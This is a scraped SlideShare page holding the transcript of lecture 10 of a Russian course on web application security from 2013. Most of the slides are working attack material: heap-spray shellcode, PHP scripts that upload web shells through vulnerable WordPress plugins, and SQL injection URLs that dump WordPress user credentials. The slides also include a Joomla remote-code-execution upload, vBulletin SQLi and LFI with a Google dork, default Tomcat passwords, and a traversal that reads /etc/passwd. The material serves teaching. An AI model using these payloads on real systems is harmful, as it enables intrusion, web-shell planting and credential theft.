Your SlideShare is downloading. ×
Безопасность интернет-приложений осень 2013 лекция 10
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Безопасность интернет-приложений осень 2013 лекция 10

3,876
views

Published on

Published in: Education

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
3,876
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
4
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. spray the heap JS VB ActionScript HTML5 SGML SVG exploit the bug profit! Любой динамически задаваемый контент. 2
  • 2. heap[slen]:NOPS nops = unescape("%u0D0D%u0D0D"); shellcode = unescape("%u...); heap = new Array(); for ( i=0; i<slen;i++){ heap[i] = nops + shellcode; } exploit(); shell heap[slen-1]:NOPS shell ... heap[0]:NOPS shell 3
  • 3. var a = (0x11223344^0x44332211^0x44332211^ ...); 0: b8 44 33 22 11 5: 35 11 22 33 44 a: 35 11 22 33 44 1: 2: 4: a: mov $0x11223344,%eax xor $0x44332211,%eax xor $0x44332211,%eax 44 inc %esp 33 22 xor (%edx),%esp 11 35 11 22 33 44 adc %esi,0x44332211 35 11 22 33 44 xor $0x44332211,%eax 4
  • 4. Wordpress checks admin location /wp-admin/ admin user admin plugins /wp-content/plugins themes /wp-content/themes scanner nmap http-wordpress-plugins nmap --script=http-wordpress-plugins --script-args http-wordpress-plugins.root="/blog/" <target> 6
  • 5. Exploit: suco theme file upload <?php $uploadfile="devilscream.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> shell: http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php 7
  • 6. Exploit: wp-realty blind sql http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php? action=contact_friend&popup=yes&listing_id=[SQLi] 8
  • 7. Exploit: Complete Gallery Manager 3.3.3 file upload <?php $uploadfile="up.php"; $ch = curl_init(" http://target/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php "); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> 9
  • 8. Exploit: All Video Gallery 1.1 sqli http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users-- 10
  • 9. Joomla checks admin location /administrator/ admin user admin components /components/com_* parameter components /?option=com_* scanner joomscan 11
  • 10. Exploit: redSHOP component sqli http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22 %20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,% 20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 12
  • 11. Exploit: com_civicrm component remote code execution wget –post-data "<?php phpinfo(); ?>" http://target/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofclibrary/ofc_upload_image.php?name=shell.php 13
  • 12. vBulletin checks admin location /admincp/ admin user admin addons / 14
  • 13. Exploit: Yet Another Award sqli Google dork: inurl:awards.php intext:"powered by vbulletin" $vbulletin->input->clean_array_gpc('p', array( 'award_id' => TYPE_UINT, //'award_request_name' => TYPE_STR, //'award_request_recipient_name' => TYPE_STR, 'award_request_reason' => TYPE_STR, 'award_request_uid' => TYPE_UNIT, )); $award_request_uid = $vbulletin->GPC['award_request_uid']; $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db>escape_string($vbulletin->GPC['award_request_reason']) ."')"); http://[site].com/request_award.php POST: do=submit&name=award_id=[VALID REWARD ID]& award_request_reason=0&award_request_uid=0[SQL]&submit=Submit 15
  • 14. Exploit: vBulletin 4.1.10 LFI http://target/Patch/includes/functions_cron.php?nextitem=[Lfi] http://[site].com/request_award.php POST: do=submit&name=award_id=[VALID REWARD ID]& award_request_reason=0&award_request_uid=0[SQL]&submit=Submit 16
  • 15. Tomcat checks admin location /admin/ /manager/ admin user admin addons / tomcat:tomcat password:password admin:admin admin:password admin:<nopassword> tomcat:<nopassword> 17
  • 16. Exploit: tomcat < 6.0.18 utf8 directory traversal GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 18
  • 17. 5 апреля 2010 jira issue: http://tinyurl.com/XXXXXXXXX XSS получение административного доступа в jira backdoor 19

×